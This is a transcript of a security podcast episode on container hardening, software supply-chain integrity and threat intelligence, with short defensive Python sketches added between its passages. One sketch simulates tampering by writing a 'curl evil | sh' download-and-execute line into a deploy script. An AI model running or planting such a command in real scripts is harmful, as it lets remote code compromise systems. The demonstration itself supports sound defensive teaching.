- Welcome to The Cyber5, where security experts and leaders answer five burning questions on one hot topic in actionable intelligence for the enterprise. Topics include adversary research and attribution, digital executive protection, supply chain risk, brand reputation and protection, disinformation and cyber threat intelligence. I'm your host, Landon Winkelvoss, co-founder of NISOS, the Managed Intelligence Company. In this episode, I talk with senior security practitioner Julie Tsai. We talk about security intelligence and modern-day technology platforms, with a concentration on how to secure container and cloud environments. We talk about the granular areas of supply chain risk in application development, and where compliance plays a critical role in ensuring the code base is not tampered with, so that when code is checked in and updates are performed, what is being submitted is truthful, accurate and complete. We also talk about where threat intelligence can augment a program like this: what noise to discount, and which data points need to be actioned to keep security events from turning into incidents. Stay with us. Julie Tsai, welcome to the show. Would you mind sharing a little bit about your background for our listeners, please? - Sure thing, thanks, Landon. Thanks for having me here. I am a cybersecurity leader and advisor. I've spent about 25 years working in various Silicon Valley companies, from early-stage seven-person startups, and then took a few years at Walmart eCommerce, so got some exposure to Fortune 500, or Fortune One in that case, and really excited to be here. - Thank you so much. I've been wanting to do a deep dive around containers and cloud infrastructure and everything that involves, from the threat hunting and threat intelligence aspect. That's what we'll be talking about today. So I guess kind of give us a little bit of a baseline.
So like you're in a modern technology environment, working with a technology company, let's call it a company that's probably somewhere between, I don't know, a hundred million and a billion dollars. There's an acknowledgement that you need to make considerable investments within security. So kind of baseline that development security operations within the modern enterprise with regard to containers and cloud infrastructure platforms. Particularly around ephemeral objects, what are the major risks? How's that different from, like, a traditional flat Windows network? - It's useful to think about in terms of what advantages the new infrastructure capabilities with containers and multi-tenancy on the same hardware provide you versus some of the older, more traditional ones. For what it's worth, with containers and virtualization and images, you can be operating system agnostic, right? You know, they could theoretically be running Windows, Linux, BSD, any range of things, but the potential that you have with containers and images is to be able to establish an assembly line of repeatable secure patterns. So if you can secure your container, secure your image upfront, and you've got your prototype or your format, you have your formula, at that point, now you can potentially deploy this at scale, right? Hundreds, tens of thousands or more in one secure pattern. Now that said, it also means that mistakes can have the same scale, right? So it comes back to what containers and some of this abstraction technology allow you to do is to get very rapid deployment of very precise configurations and architecture. But then it becomes even more incumbent that the upstream effort to harden the container and to set the right images or configurations is truly correct upfront.
One of the things that you have to think hard about in terms of the uniqueness of containers is what are the potentials for container-to-container compromise, or host OS level compromises that might impact the container? As you're configuring and prescribing your environment, the baseline of what you want to deploy, you wanna make sure that your initial efforts around the host OS and the container configurations are really done well: that you know you've stripped things down to just the things that you need, that you know what kinds of users and groups are allowed at that level and what permissions level your containers and your applications are going to be working at, and that you have a plan around network access and service access. So in a lot of ways, the security benefits that you gain from this are in part due to the higher level of attention or rigor that you need to put around the recipes in the beginning. But once you do that, then you have something that's potentially massively scalable, because you have now captured the secure configurations you set in the beginning. Now you do have to also pay special attention to memory access, and being aware of what exploits or what applications are going to be running in what level of memory space. So when you have a container configuration for your infrastructure, you still have a shared kernel, but now you have these more modular application containers and services layered on top of that. So you have to be very, very cognizant of whether there are things that can break out of that container, or whether there's host OS level hardening that you have to do to make sure that kernel-level memory and that kind of thing doesn't get compromised and impact all the layers that are dependent upon it. - There's a lot to unpack right there. I mean, as security professionals, right? You understand that if an attacker can compromise one container, regardless of how long it's stood up before being removed, you can probably compromise numerous containers.
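The hardening checks described here, running as a non-root user, stripping permissions down, controlling what the container is allowed to do, can be audited mechanically before anything is deployed at scale. A minimal sketch in Python; the config keys below loosely mirror Docker-style container settings but are illustrative assumptions, not a real runtime API:

```python
# Illustrative audit of a container config for common hardening gaps.
# The dict keys are assumptions for this sketch (loosely Docker-style),
# not an actual container runtime's schema.

def audit_container(config: dict) -> list:
    """Return a list of hardening findings for one container config."""
    findings = []
    if config.get("user", "root") in ("root", "0"):
        findings.append("runs as root: set a non-root user")
    if config.get("privileged", False):
        findings.append("privileged mode: container can reach host devices")
    if not config.get("read_only_rootfs", False):
        findings.append("writable root filesystem: consider read-only")
    for cap in config.get("cap_add", []):
        if cap in ("SYS_ADMIN", "NET_ADMIN", "ALL"):
            findings.append(f"dangerous capability added: {cap}")
    return findings

risky = {"user": "root", "privileged": True, "cap_add": ["SYS_ADMIN"]}
for finding in audit_container(risky):
    print(finding)
```

Because the same image fans out to hundreds or thousands of instances, a gate like this runs once per image at build time, which is exactly the "get the recipe right upfront" leverage described above.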
You can probably find a way to traverse and access code that's critical to the business that's pushed to production. I mean, at that point you're very much in the environment, to use a buzzword. I mean, this is the build process that ultimately can lead to an event like a SolarWinds-type event. You know, understanding those risks, I think we'd all admit, like, compliance is compliance, but I think that compliance has a place to really ensure completeness, accuracy and truth for any threat hunting team, and that's so critical in incident response, so how do you keep accountability in that type of environment? - Great question. I wanna tread gently here, because I know that people think of or hear accountability in different ways. I think it does get back to root values that you need in any organization to thrive, right? There's responsibility, mutual respect, and mutual accountability, right? The code and the development is a core essential piece of that puzzle, but it's only one part of it. One of the things that people talk about a lot nowadays, which I think is an excellent analogy, is the supply chain, right? Or the factory assembly line. And it gets back to manufacturing principles around quality control that some of the DevOps gurus like Gene Kim and Josh Corman got to through Deming's principles around quality: knowing exactly what's going into the build or the recipes of it, and knowing at each step of the way exactly what's happening, that there is a prescriptive and high level of quality and no tampering. So if we take some of these concepts from the physical world that people are conversant with, that's tangible, right? Like, I can imagine a widget along an assembly line being put together and different things being added to it and changed. At each point, can I guarantee the integrity of that change or the thing that was added to it? And that's where the environment and the deployment pipeline start to become really important, right?
Because you may have secured your code, you may have guaranteed the sanctity of a specific source control commit or a pull request, but how about all the changes and touches that happen along the line? You know, when you added such and such package, you did a build on it, when you ran this particular script and then you deployed it to this other environment, and then other things could touch it and impact it; all these different things need to have visibility and controls. And if that pipeline is well understood and it's predictable and controlled in a good way, and you know at each step what the expected output was, either in terms of execution of scripts or what the checksums of those values were supposed to be, you can come out with a very, very high level of precision on your end product, right? But if it's loosey-goosey and there's a lot of different ways for people to come into that pipeline at various points, and unpredictability in what's coming in and out, any team, any professionals would be very, very highly challenged to guarantee what the outcome was. So I think when you look at things like SolarWinds, why environment and context start to become really important is that there are many different places that security issues can get injected into the end product. And it's like that expression: the blue team has to be right all the time, the red team only has to be right once, right? So all those things start to become really important. Containers are an important part of that puzzle, in addition to configuration management. I think that these classic principles shouldn't be underrated for knowing exactly what you're putting into your special sauce, but none of these things are a silver bullet by themselves. They all require attention and care and feeding, and they can be properly leveraged to do much more than one might have in the past, but they still need that attention.
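The "know the expected checksum at each step" idea can be sketched concretely: record a digest for every artifact as it enters a pipeline stage, then refuse to proceed if anything no longer matches. A minimal Python sketch; the artifact names and in-memory manifest format are illustrative assumptions, not any specific CI system's API:

```python
# Sketch: verify that each pipeline artifact still matches the SHA-256
# digest recorded when it entered the stage. Artifact names and the
# manifest layout are illustrative assumptions for this example.
import hashlib

def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def verify_stage(artifacts: dict, manifest: dict) -> list:
    """Compare artifact bytes against expected digests.
    Returns the names of anything tampered with or missing."""
    failures = []
    for name, expected in manifest.items():
        data = artifacts.get(name)
        if data is None or sha256_of(data) != expected:
            failures.append(name)
    return failures

build = {"app.tar": b"compiled output",
         "deploy.sh": b"#!/bin/sh\necho deploy\n"}
manifest = {name: sha256_of(data) for name, data in build.items()}
print(verify_stage(build, manifest))                  # untouched: []
build["deploy.sh"] = b"#!/bin/sh\ncurl evil | sh\n"   # simulated tampering
print(verify_stage(build, manifest))                  # ['deploy.sh']
```

The design point is that each handoff re-verifies against the previous stage's manifest, so an injection anywhere along the line surfaces at the very next step instead of in the shipped product.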
And it gets back to what a lot of security teams like to emphasize about defense in depth and attention, and what you mentioned about accountability: the teams that are responsible are the custodians and stewards of each step of that pipeline. There have to be really, really clear handoffs and accountability. Like, I am responsible for up to this point, now I'm doing a clean and known handoff to this next team, and then they're going to do these transformations on it, and then it's getting handed off again. So you want to make sure, especially when you have a lot to protect, either in terms of your customer base or their data, your profile starts to expand, and the attack surface starts to get deeper. All of those things about that process and the mutual accountability need to get tighter and tighter. - The supply chain is in the news often, particularly around Log4j, and a lot of things are coming out of the White House here in the last six months. Why is the supply chain within the technology environment so hard? - I think it gets back to complexity management and also the transfer of liability. You know, what you're talking about here in terms of accountability: when things are very close to us, either in terms of what we created or what we have oversight over, right? You know, we feel more accountable to it, and it's also much harder to dodge accountability. When it starts becoming another party, a third party or their dependencies, a third party's third-party dependencies, trying to trace what the guarantees are along the line, you end up having to rely on a much lower level of visibility, usually some kind of contractual agreement, which can't capture all of the nuances, and also the variety and complexity of different supply chain pipelines and the different dependencies inside of there.
It's hard enough for us to know and to manage the things that are within our own environment, much less have any chance of understanding the provenance and the chain of custody of something in another company or another environment or their third-party contracts. So you can see that very quickly, the complexity management almost becomes one of those geometrically harder problems in terms of controlling all of those things, and as the components and the scale of a particular project expand, that complexity just spirals up. So if you don't have both the tooling and the processes dialed in from an early stage, it can be a lot for security teams to get their arms around. - Is it even possible, from your perspective, to ultimately have visibility into all those different dependencies that you can't control? Does there almost need to be a shift in that type of transparency, in how technology is built? - I think one has to be a realist about it, and I do think that over time, if we're gonna have any hope of really inter-operating and managing our stuff in any kind of trustworthy way, we as technology creators and vendors to each other have to really commit to making things more simple and transparent. I think open source has done a tremendous amount in this arena in terms of decoupling the idea of security from obscurity, right? You know, this idea that, "Hey, the strength of the security is not about not knowing the algorithm. It's that you can't necessarily break it." So the overall principle should be: I can disclose enough about what we do and how we do it without giving away essential secrets. And I think that's one major step, but I think that we do have a complexity problem, because the demands aren't stopping. There are all the normal pressures to create and move fast with limited staffs. And so the commitment to simplifying isn't always there unless the consumer's demanding it.
So we have to demand it of each other and maybe help consumers, laypeople, to really understand what's happening under the hood in a way that's transparent, and I think that becomes more of a cultural change. But I do think that it's important to continue to hold high standards. We can't just throw up our hands and say, "Hey, it can't be done, so forget it." What we're guarding here is pretty important. It comes back to integrity and confidentiality and trustworthiness. We can't afford not to continue trying. I remember a teacher once telling my class, "You know, I'm gonna tell you a secret," he said. "It's impossible to be perfect. I'm not supposed to tell you that, but it's impossible to be perfect. But it's the trying that matters." And there was this really important contradiction there that I think I also take into security, in that you're not gonna be perfect, but what you have to do is keep up the rigorous examination of what you're doing and how you're doing it, so that you're always investing your efforts in the right place and surfacing things up for fundamental or revolutionary changes where they need to be. So I think in that respect, we have to keep pushing the envelope on that. There are certain things that, over the last 30 to 40 years, consumers have adapted to so much, right? Like, not only do we all have computers on our desktops and in home offices and schools now, but everyone wears devices, and oftentimes now multiple ones. Could we not also challenge each other and our consumers to understand better what kind of data is being stored and what data is being given away? You know, two-factor authentication used to be something that only specialized professionals were working with, but now it's something that every consumer is familiar enough with. So I think we have to set that bar for ourselves as well as our customers in terms of really understanding what's happening.
- That's absolutely fascinating, and I guess it leads to something you said earlier around manufacturing. You know, I wanna be careful, certainly, how I say this. Nobody in technology likes the regulation word. - Sure, sure. - But be that as it may, right? Manufacturing, energy, these are environments that have had compliance standards. To your point, if there's something that goes into a retail product, a consumer product, a manufacturing process, they know exactly, okay, that machine at that time on that date had a problem, that's where the problem is, let's do a recall. These are all very tried and true processes that a lot of these types of companies have to comply with. What can the technology sector learn from that, and where do we kind of need to adapt here over the next three to five years? - We can certainly borrow the important concepts here, right? Like being able to know the integrity of every artifact and understanding how something goes together. You know, that's something that those manufacturing principles build in in terms of policies. But in the technology sector, we do some version of this too, right? Like, in any kind of source control commit trail, those are all checksums that we're double-checking, or fingerprinting different kinds of artifacts. There's a way to make this tech-native, but still borrow the principle behind it. I think that the gap that I see is that a lot of people outside of the industry don't connect the abstractions of the computing supply chain with the physical things that they see every day, like the meat at the grocery store or the pharmaceuticals, a bottle of aspirin at the drug store; that, hey, there's a parallel for that in the digital world. So I think we can definitely be borrowing from those things.
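The tech-native lot number mentioned here already exists in the commit trail: Git content-addresses every file, so any byte of tampering changes its ID and breaks the chain. A short sketch reproducing Git's own blob fingerprint with the standard library (the file content is an arbitrary example):

```python
# Sketch: Git fingerprints every file ("blob") as the SHA-1 of the
# header "blob <size>\0" followed by the content. Any tampering with
# the bytes changes this ID, which is what makes the commit trail a
# digital chain of custody.
import hashlib

def git_blob_id(content: bytes) -> str:
    header = b"blob %d\0" % len(content)
    return hashlib.sha1(header + content).hexdigest()

print(git_blob_id(b"hello\n"))
# Matches what `git hash-object` prints for a file containing "hello\n":
# ce013625030ba8dba906f756967f9e9ca394464a
```

Because commits then hash the tree of blob IDs, and each commit hashes its parent, verifying one commit ID transitively verifies the integrity of the whole history, the digital analogue of tracing a defective part back to one machine on one date.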
I think for the tech industry, and for ourselves as peers, the way that I would characterize it is that we should have internal discipline and internal regulation over these things so that we can have a say in how this goes. Every technologist wants to help create a better future, or a more powerful future, but we also have to include security and safety and privacy as part of the goods with that: if I can do this thing in a way that's more secure and transparent, that's also a good. You know, speed and volume are not the only qualities or goods that we're looking for. And we have to be able to understand that if we don't show that quality of internal regulation ourselves, then something else will force it from the outside, either some terrible major event or some zealous lawmakers. And so I think it's definitely in our interests to do the right thing and to internalize, "Hey, this is the way I think it should go," so that we can still maintain our speed and precision and elegance, but really still help the consumer. I think it's important to understand that there's some kind of feedback loop there, right? To how that happens. One of my favorite technologists, Mark Burgess, said years ago that we haven't yet had our Three Mile Island incident with information technology, but when you consider how much is dependent on it nowadays, from power grids to utilities to the way we produce food and every manufacturing thing, there's a tremendous amount of important and fragile things that computing technology is in charge of. - That's very nuanced for sure, and it's gonna be certainly interesting to see how this evolves, and certainly how we can do so in a way that doesn't invite outside influence or control from regulators, 'cause I mean, that's part of the interest and fun in technology: we can move fast and just change markets in a lot of different ways.
Shifting slightly, this is generally an intelligence or threat intelligence type podcast. I'm kind of curious how threat intelligence really can be applied here. Like, if you're tearing down a container or a cloud instance every time a malicious actor scans the environment or gets a ping, that's just not gonna be fruitful for the business. Thinking about, like, outside-the-firewall telemetry and everything that can be collected, how can that be used in a way that's actionable in these types of environments that you're talking about, regarding DevSecOps and container environments? - Threat intel is a fundamental and critical piece of the security puzzle and the stability puzzle for any organization, and I think it gets back to the heart of that question you asked about whether or not it's realistic to be perfect. No, it's not realistic to be perfect, and it's a little bit of a mindset shift for, I think, DevOps or infrastructure professionals, where you can afford to be a little bit more purely internal-looking and say, "Okay, well, this is my area, I'm master of or mistress of my domain, and I know exactly everything that went in there." Great, but you are not going to be able to account for what the most significant threats out there are if you don't have an ear to the ground and your eyes open for what's happening in the landscape. Understanding where threats are gathering, where people are trying to focus their efforts, and being really, really keyed into, "Hey, right, this group is sending out benign scans every few hours." But if we're not seeing a change in other activity, other, deeper types of attacks, we're gonna accept that there's a certain amount of noise there. But what I am very concerned about is, let's say those login attempts are trying to come in from this other place, and they seem to be changing their approach every couple of days. So you cannot afford to be too insular.
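One way to operationalize "accept the steady scan noise, flag the change in behavior" is a simple per-source baseline: tolerate each source's usual rate, alert only when its recent activity jumps well beyond that. A minimal sketch; the event shape, window sizes, and threshold factor are illustrative assumptions, not tuned values:

```python
# Sketch: accept steady background noise from a source, but flag any
# source whose recent activity rate jumps well above its own baseline.
# The threshold factor and event format are illustrative assumptions.
from collections import Counter

def flag_changed_sources(baseline_events, recent_events, factor=3.0):
    """Return sources whose recent event count exceeds factor x baseline."""
    base = Counter(e["src"] for e in baseline_events)
    recent = Counter(e["src"] for e in recent_events)
    flagged = []
    for src, count in recent.items():
        expected = base.get(src, 0)
        if count > factor * max(expected, 1):  # floor of 1 avoids div-by-zero logic
            flagged.append(src)
    return sorted(flagged)

# A known scanner keeps its usual pace; another source ramps up sharply.
baseline = [{"src": "scanner-A"}] * 10 + [{"src": "10.0.0.5"}] * 2
recent   = [{"src": "scanner-A"}] * 11 + [{"src": "10.0.0.5"}] * 40
print(flag_changed_sources(baseline, recent))  # ['10.0.0.5']
```

The point mirrors the comment above: the known benign scanner stays below threshold and is treated as noise, while the source that changed its approach surfaces for investigation, without tearing anything down on every ping.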
You have to look outwards and understand what's happening in the ecosystem, because you're always gonna have not enough resources, not enough people, not enough defense in depth. So you've gotta make really smart decisions, based on your internal strengths and weaknesses and based on your threats and opportunities outside, about where you're gonna put your chips. - Where do you prioritize that in everything that you have to do? When you talk about identity and access management, you talk about blocking attacks, you talk about firewall policies, you talk about EDR, the defense in depth paradigm that you just kind of listed? I know that's not one size fits all, but kind of where does intelligence really start to add value? - I think you're gonna see the value the most in companies and services that are highly attacked, right? You know, in areas that are high interest, or where for whatever reason the technology or the value of what's being held is highly sought after by some constant, focused group outside of yours. In that case, that's where you're gonna start seeing rewards on your threat intel program immediately. I think one of the challenges in the security and the threat space is that we have to overcome our own blinders or assumptions about what we think an attacker would be interested in. I can't tell you how many times I've heard, "Oh, well, you know, that's improbable, or I'm not interested, or that's probably not gonna happen." And it's like, "Well, that's true for you. Maybe you and I wouldn't try to attack in that way. But someone out there, this particular profile, they have a different interest." And so you have to really empathize that there are gonna be different types of motivated people out there, and you cannot always anticipate, you can't always graft your own psychology onto what an external group is gonna do.
So you have to be humble and be realistic about, "Hey, how attacked do I think we're gonna be?" Now, when is the right time to start a threat intel program? I think from the beginning. Most companies will see it as a higher level of activity, and so you're not necessarily going to put the lion's share of your budget in an infant security program toward threat intel, and that's the right thing to do: unless your attack profile is particularly bad, focus on internal strengthening and defenses. However, I think that, as with most things, things are easier to graft onto in the long run if you have an early, native concept of them. So even if your initial threat intel program is something that's a lighter touch than what you might do two or three years down the line with a bigger team and more tooling, you might start with getting some key feeds or cultivating a few key relationships or associations, and maybe that's what your team can afford to do when it's a certain size. And then as things change and as you're starting to see more signal, you will also get more feedback on whether this is gonna be useful to you and how much more you should ramp it up. Because you must go in with the assumption that you're not gonna be able to predict every worst threat or how costly it's going to be to you. So go in with enough humility to distribute the bet somewhat. Since security is a weakest-link-in-the-chain issue, you wanna make sure that you have some type of coverage in every essential area. - And when you say essential areas, what do you mean exactly? - Coming into a new program, you might be looking at, "Okay, we need to do a very good risk assessment. We need to set standards and figure out how we map to certain business goals we have." You might be looking at standing up your internal defenses, making sure that your network security and your vulnerability management are ramping up as quickly as they need to be.
So those are things that are fundamentals. Your monitoring and incident detection, those are fundamentals, and you're building those core pieces together, and I think threat intel is a piece of that. And in the beginning, even if it's a lighter touch, you wanna give that program the roots to develop over the longer view. - Are there any key aspects of threat intelligence specifically that you would want to focus on? I mean, do you focus on doing attack surface management? Do you look at, like, getting credential dumps? Do you wanna focus on answering just RFIs or basic questions that are out there? I guess, kind of, what would be a good starting place, looking at the technology sector? - With any new capacity, you start with a simple question about, "What's my monitoring or knowledge level going to be, and what's my actionability, my fix rate or remediation, gonna be?" And so you just start with some very simple questions around that. Now, where to focus your threat intel efforts I think really has to be tailored to your business. If you work in a business where you have a lot of customers that are not as savvy about passwords, or it's a very wide audience, a very broad audience, you have to pay attention to account management and credentials, especially things that are found in the wild. If you have very high value targets, either in terms of your community base or your executive profiles, you have to look at how information is shared out publicly and what kind of lines of defense you have around certain kinds of information. How are you categorizing data and monitoring signal on that? So I think where you wanna focus first: I start with those simple questions about monitoring and fixing, and what's the nature of my business in terms of my crown jewels?
Whether it's revenue or data or special technical facts, and the profiles of the people who are using my site, as well as the profiles of the type of attackers we draw. You know, a banking site will have a very different profile than an e-commerce site or a gaming site, or even probably a cryptocurrency site. There will be overlap, of course, but certain kinds of products and infrastructures are gonna draw out different kinds of threats. - Julie, you're world class in your craft. I can't thank you enough for taking the time, and I appreciate you joining the show today. - For the latest subject matter expertise around managed intelligence, please visit us at www.nisos.com. There we feature all the latest content from NISOS experts on solutions ranging from supply chain risk, adversary research and attribution, digital executive protection, merger and acquisition diligence, brand protection and disinformation, as well as cyber threat intelligence. A special thank you to all NISOS teammates who engage with our clients to solve some of the world's most challenging security problems on the digital plane and conduct high-stakes security investigations. Without the value the team provides day in, day out, this podcast would not be possible. Thank you for listening.